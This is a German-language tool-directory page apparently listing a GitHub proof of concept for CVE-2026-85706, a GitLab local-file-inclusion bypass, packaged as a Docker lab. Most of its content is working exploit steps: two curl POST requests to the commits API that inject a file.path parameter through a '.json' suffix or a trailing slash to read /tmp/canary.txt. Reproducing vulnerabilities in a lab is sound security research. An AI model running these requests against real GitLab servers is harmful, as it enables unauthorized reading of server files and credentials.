Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-85706_docker_exp — Docker-basierte Reproduktionsumgebung und PoC für CVE-2026-85706, die GitLab-LFI-Bypass über .json-Suffix und Pfadtricks mit abschließendem Schrägstrich demonstriert. | Kitploit
Tools/GitHubGitHub/flowerwitch/cve-2026-85706_docker_exp
Container-SicherheitSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLabs & Praxis
GitHubflowerwitch/cve-2026-85706_docker_exp

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-85706_docker_exp

Docker-basierte Reproduktionsumgebung und PoC für CVE-2026-85706, die GitLab-LFI-Bypass über .json-Suffix und Pfadtricks mit abschließendem Schrägstrich demonstriert.

Repository anzeigen
vor 4h 23mNoch nicht geprüft

1. Docker starten

root@kitploit:~
git clone  https://github.com/FlowerWitch/CVE-2026-85706_docker_exp
docker compose up -d
  1. LFI-Testinformationen schreiben
root@kitploit:~
docker exec gitlab-vuln bash -c 'echo "SECRET-CANARY-85706-%%%" > /tmp/canary.txt'
  1. Auslesen und Verifizieren
root@kitploit:~
# Umgehungsmethode 1: .json-Suffix
curl -s -w "\nHTTP %{http_code}\n" -X POST "http://localhost:8085/api/v4/projects/1/repository/commits.json" \
  -H "Content-Type: application/json" \
  --data '{"file":"","file.path":"/tmp/canary.txt","file.size":1,"Content-Type":"application/x-www-form-urlencoded"}'

# Umgehungsmethode 2: abschließender Schrägstrich
curl -s -w "\nHTTP %{http_code}\n" -X POST "http://localhost:8085/api/v4/projects/1/repository/commits/" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  --data 'file=&file.path=/tmp/canary.txt&file.size=1&Content-Type=application/x-www-form-urlencoded'
image
Tool herunterladen